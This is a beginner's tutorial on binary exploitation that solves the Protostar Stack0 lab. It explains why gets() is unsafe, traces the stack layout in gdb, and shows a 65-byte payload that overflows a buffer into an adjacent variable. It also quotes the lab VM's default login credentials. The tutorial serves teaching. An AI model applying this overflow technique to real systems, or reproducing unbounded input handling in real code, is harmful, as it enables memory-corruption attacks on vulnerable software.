An Introduction To Binary Exploitation

Interested in binary exploitation? Then welcome to a very detailed beginner's guide and introduction to help you start your journey in binary exploitation!

Protostar from Exploit Exercises introduces basic memory corruption issues such as buffer overflows, format strings and heap exploitation on an “old-style” Linux system that does not have any form of modern exploit mitigation enabled.

After that we can move to more difficult exercises. Let's start with Stack0.

First of all, we take the code from Stack0:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

If you are familiar with the basics of C, you can skip this part here.

Let's break down this simple code:

On the first three lines we can see some header files. As tutorialspoint says:

A header file is a file with extension .h which contains C function declarations and macro definitions to be shared between several source files. There are two types of header files: the files that the programmer writes and the files that comes with your compiler.

argc stands for "Argument Count". The number of parameters will be stored in the parameter argc. Let's do an example:

#include<stdio.h>

int main(int argc, char* argv[]) {

	printf("argc = %d\n", argc);
	return 0;
}

If we now compile this program with gcc PROGRAM.c -o compiled and execute it with one argument (like ./compiled WOW), it should print argc = 2, because argc counts the program name itself as well as the argument WOW.

argv stores the arguments themselves as an array of strings (char pointers): here argv[0] is "./compiled" and argv[1] is "WOW". Really, really basic stuff.

volatile int modified;

The keyword volatile tells the compiler that the value of the variable may change at any time, without any action being taken by the code the compiler finds nearby. In Stack0 it keeps the compiler from optimizing away the later check of modified.

char buffer[64];

This declares an array of 64 bytes. It can hold an input of up to 63 characters plus the terminating null byte.

modified = 0;

The variable modified is set to 0.

gets(buffer);

So, to get to know gets() we can use the man page provided by Linux. So we run 'man gets'.

gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte ('\0'). No check for buffer overrun is performed (see BUGS below).
Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.

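So, now we know the bug in this program: gets() does not check the length of its input, so anything longer than the 64-byte buffer is written past its end. The if-statement checks whether the variable modified is still 0. Now we have a complete understanding of what this code does. Let's break it!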
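To make the bug concrete before touching the real binary, here is a minimal Python 3 sketch that models it. It is only a simulation, not the program itself: it assumes that modified sits directly after buffer in memory (the disassembly later in this article confirms that for this binary), and the helper names make_frame, unsafe_gets, bounded_fgets and read_modified are made up for this illustration.

```python
BUFFER_SIZE = 64  # char buffer[64]
INT_SIZE = 4      # a 32-bit int, as on the Protostar VM


def make_frame():
    """Model both locals as one flat block: buffer first, modified right after (assumed)."""
    return bytearray(BUFFER_SIZE + INT_SIZE)


def unsafe_gets(frame, line):
    """Mimic gets(): store the whole line plus a null byte, never checking BUFFER_SIZE."""
    for i, byte in enumerate(line + b"\x00"):
        if i < len(frame):  # limit of this model only; the real gets() keeps writing
            frame[i] = byte


def bounded_fgets(frame, line, size=BUFFER_SIZE):
    """Mimic the bound of fgets(): store at most size - 1 bytes plus a null byte."""
    data = line[:size - 1] + b"\x00"
    frame[:len(data)] = data


def read_modified(frame):
    """Interpret the 4 bytes after the buffer as a little-endian int."""
    return int.from_bytes(frame[BUFFER_SIZE:], "little")


frame = make_frame()
unsafe_gets(frame, b"A" * 65)
print(hex(read_modified(frame)))  # 0x41: the 65th byte spilled into modified

frame = make_frame()
bounded_fgets(frame, b"A" * 65)
print(hex(read_modified(frame)))  # 0x0: the input was cut off inside the buffer
```

In this model an input of exactly 64 characters still leaves modified at 0, because only the terminating null byte lands in it. The model also ignores that fgets() keeps the newline when it fits.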

Exploitation

First of all we need to download the Protostar image. Then we can log in to that machine with ssh. Username: user / Password: user.

$ ssh [email protected]


    PPPP  RRRR   OOO  TTTTT  OOO   SSSS TTTTT   A   RRRR  
    P   P R   R O   O   T   O   O S       T    A A  R   R 
    PPPP  RRRR  O   O   T   O   O  SSS    T   AAAAA RRRR  
    P     R  R  O   O   T   O   O     S   T   A   A R  R  
    P     R   R  OOO    T    OOO  SSSS    T   A   A R   R 

          http://exploit-exercises.com/protostar                                                 

Welcome to Protostar. To log in, you may use the user / user account.
When you need to use the root account, you can login as root / godmode.

For level descriptions / further help, please see the above url.

[email protected] password: user
Linux (none) 2.6.32-5-686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 17 13:38:12 2018 from 192.168.0.54
$

Our file is located at /opt/protostar/bin. Let's run it once:

user@protostar:~$ /opt/protostar/bin/stack0
AAAA
Try again?

The code jumps into the else-statement and prints out "Try again?". Our main goal is to modify the variable modified and get the output: "you have changed the 'modified' variable".

Now let's open stack0 in gdb with: gdb /opt/protostar/bin/stack0.

user@protostar:~$ gdb /opt/protostar/bin/stack0
Reading symbols from /opt/protostar/bin/stack0...done.
(gdb) 

Now we can disassemble the main function:

(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>:  push   ebp
0x080483f5 <main+1>:  mov    ebp,esp
0x080483f7 <main+3>:  and    esp,0xfffffff0
0x080483fa <main+6>:  sub    esp,0x60
0x080483fd <main+9>:  mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>: lea    eax,[esp+0x1c]
0x08048409 <main+21>: mov    DWORD PTR [esp],eax
0x0804840c <main+24>: call   0x804830c <gets@plt>
0x08048411 <main+29>: mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>: test   eax,eax
0x08048417 <main+35>: je     0x8048427 <main+51>
0x08048419 <main+37>: mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>: call   0x804832c <puts@plt>
0x08048425 <main+49>: jmp    0x8048433 <main+63>
0x08048427 <main+51>: mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>: call   0x804832c <puts@plt>
0x08048433 <main+63>: leave  
0x08048434 <main+64>: ret    

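The first four lines of the disassembly aren't very interesting: they are the function prologue, which sets up the stack frame, aligns the stack and reserves 0x60 bytes for local variables.

The first interesting line is the fifth line. It writes the value 0x0 to the memory address $esp + 0x5c: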

0x080483fd <main+9>:  mov    DWORD PTR [esp+0x5c],0x0

This is the modified variable, since the same memory address is read back after the call to gets() and checked against 0 using test eax,eax.
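As a rough model of that check, the sketch below mirrors what test eax,eax followed by je does: test ANDs the register with itself and sets the zero flag when the result is 0, and je jumps when the zero flag is set. The function names are made up for this illustration, and the mapping of the two puts calls to the two messages is inferred from the C source rather than read from the binary.

```python
def je_is_taken(eax):
    """test eax,eax sets the zero flag when eax AND eax is 0; je jumps if it is set."""
    zero_flag = (eax & eax) == 0
    return zero_flag


def message_for(modified):
    """Return the message the program would print for a given value of modified."""
    if je_is_taken(modified):
        # Jump to <main+51>: the else-branch of the C source.
        return "Try again?"
    # Fall through to <main+37>: the if-branch of the C source.
    return "you have changed the 'modified' variable"


print(message_for(0))
print(message_for(0x41))
```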

The next few lines say that the buffer array starts at the memory address $esp + 0x1c: that address is loaded into eax and passed to gets() as its argument.

0x08048405 <main+17>: lea    eax,[esp+0x1c]
0x08048409 <main+21>: mov    DWORD PTR [esp],eax
0x0804840c <main+24>: call   0x804830c <gets@plt>

Given that 0x5c - 0x1c is 64 bytes, we see that buffer and modified are allocated right next to each other on the stack.
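The same arithmetic as a small Python 3 sketch, using only the offsets read off the disassembly above. The constant names are made up for this illustration.

```python
BUFFER_OFFSET = 0x1c    # lea eax,[esp+0x1c]
MODIFIED_OFFSET = 0x5c  # mov DWORD PTR [esp+0x5c],0x0
FRAME_SIZE = 0x60       # sub esp,0x60

# Distance from the first byte of buffer to the first byte of modified.
distance = MODIFIED_OFFSET - BUFFER_OFFSET
print(distance)  # 64, exactly sizeof(buffer)

# Bytes left between modified and the end of the reserved area.
print(FRAME_SIZE - MODIFIED_OFFSET)  # 4, exactly one 32-bit int
```

So the 64 bytes of buffer are followed immediately by the 4 bytes of modified, with no gap in between.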

We can modify the modified variable by writing past the space allocated for the buffer: a so-called buffer overflow. We set a breakpoint at *0x080483fd, because that is where the variable modified is set to 0.

(gdb) break *0x80483fd
Breakpoint 1 at 0x80483fd: file stack0/stack0.c, line 10.

Now let's run the program.

(gdb) r
Starting program: /opt/protostar/bin/stack0 

Breakpoint 1, main (argc=1, argv=0xbffffd64) at stack0/stack0.c:10
10  stack0/stack0.c: No such file or directory.
  in stack0/stack0.c
(gdb) next
11  in stack0/stack0.c
(gdb) next
AAAAAAAAAAAAAAAAAAAAAAAA
13  in stack0/stack0.c

After typing next twice, the program waits for input, so we typed in some capital A's.

The variables are stored on the stack, which means we can now view them with the command x/40xw $esp. Let's analyze it. The x after the slash means that the output is printed in hexadecimal, 40 is the number of units to print, w makes each unit a 4-byte word, and $esp is the register whose value is used as the start address.

(gdb) x/40xw $esp
0xbffff770:     0xbffff78c      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff780:     0xb7fd7ff4      0xb7ec6165      0xbffff798      0x41414141
0xbffff790:     0x41414141      0x41414141      0x00414141      0x080482e8
0xbffff7a0:     0xb7ff1040      0x08049620      0xbffff7d8      0x08048469
0xbffff7b0:     0xb7fd8304      0xb7fd7ff4      0x08048450      0xbffff7d8
0xbffff7c0:     0xb7ec6365      0xb7ff1040      0x0804845b      0x00000000
0xbffff7d0:     0x08048450      0x00000000      0xbffff858      0xb7eadc76
0xbffff7e0:     0x00000001      0xbffff884      0xbffff88c      0xb7fe1848
0xbffff7f0:     0xbffff840      0xffffffff      0xb7ffeff4      0x0804824b
0xbffff800:     0x00000001      0xbffff840      0xb7ff0626      0xb7fffab0

Notice the 0x41 bytes stored in memory, starting at 0xbffff78c: 0x41 is the ASCII code for the letter A. The word at 0xbffff7cc ($esp + 0x5c) is still 0x00000000; that is where our modified variable is stored.
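If reading the dump by eye is awkward, a short Python 3 sketch can do it for us. It assumes the value of $esp shown in the first row of the dump (0xbffff770) and the two offsets from the disassembly. The helper names are made up for this illustration.

```python
import struct

ESP = 0xbffff770        # address of the first row in the dump above
BUFFER_OFFSET = 0x1c    # from lea eax,[esp+0x1c]
MODIFIED_OFFSET = 0x5c  # from mov DWORD PTR [esp+0x5c],0x0


def word_to_text(word):
    """Unpack a 32-bit word as it lies in memory (little-endian) into printable text."""
    raw = struct.pack("<I", word)
    return "".join(chr(b) if 32 <= b < 127 else "." for b in raw)


def dump_position(address):
    """Return (row address, column index) of a word in an x/40xw $esp dump."""
    offset = address - ESP
    return ESP + (offset // 16) * 16, (offset % 16) // 4


print(word_to_text(0x41414141))  # AAAA
print(word_to_text(0x00414141))  # AAA. (three A's, then the null byte written by gets)

buffer_addr = ESP + BUFFER_OFFSET
modified_addr = ESP + MODIFIED_OFFSET
print(hex(buffer_addr), hex(modified_addr))  # 0xbffff78c 0xbffff7cc

row, column = dump_position(modified_addr)
print(hex(row), column)  # 0xbffff7c0 3: the last word in that row
```

Note that the stack addresses depend on the environment the program runs in, so the value of ESP may differ on another setup; the offsets stay the same.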

Let's reach the variable!

Each 4-byte word such as 0x41414141 holds four A's. The buffer spans 16 of these words, from 0xbffff78c up to 0xbffff7cb, and 4 * 16 is 64 bytes. One more byte, the 65th, lands in the modified variable. Let's do that:

user@protostar:~$ echo `python -c "print 'A'*65"` | /opt/protostar/bin/stack0
you have changed the 'modified' variable

And we have changed our variable!
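The one-liner above uses Python 2 syntax, which is what the Protostar VM provides. As a minimal sketch of the same payload in Python 3 (an assumption: you generate it on a machine that has Python 3; the file name payload.py and the function name build_payload are made up for this illustration):

```python
import sys

BUFFER_SIZE = 64  # char buffer[64]


def build_payload(overflow=b"A"):
    """Fill the buffer completely, then append the bytes that spill into modified."""
    return b"A" * BUFFER_SIZE + overflow + b"\n"


def resulting_modified(payload):
    """Value modified would hold: the bytes after the buffer (newline dropped), little-endian."""
    spilled = payload.rstrip(b"\n")[BUFFER_SIZE:BUFFER_SIZE + 4]
    return int.from_bytes(spilled.ljust(4, b"\x00"), "little")


if __name__ == "__main__":
    # Write raw bytes so that nothing is re-encoded on the way to the pipe.
    sys.stdout.buffer.write(build_payload())
```

Saved as payload.py, the output could be piped into the binary the same way as before, for example python3 payload.py | /opt/protostar/bin/stack0. With the default argument, resulting_modified(build_payload()) is 0x41, which is a single A in the lowest byte of modified.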

With Python we can simply print 65 A's and pipe them into our binary. Visually it would look like this:

0xbffff770:     0xbffff78c      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffff780:     0xb7fd7ff4      0xb7ec6165      0xbffff798      0x41414141
0xbffff790:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7b0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7c0:     0x41414141      0x41414141      0x41414141      0x00000041
0xbffff7d0:     0x08048450      0x00000000      0xbffff858      0xb7eadc76
0xbffff7e0:     0x00000001      0xbffff884      0xbffff88c      0xb7fe1848
0xbffff7f0:     0xbffff840      0xffffffff      0xb7ffeff4      0x0804824b
0xbffff800:     0x00000001      0xbffff840      0xb7ff0626      0xb7fffab0

Hope you liked this introduction!

The GIF used to head this article is called "Flock Of Binaries" and it was created by Morton Niklasson.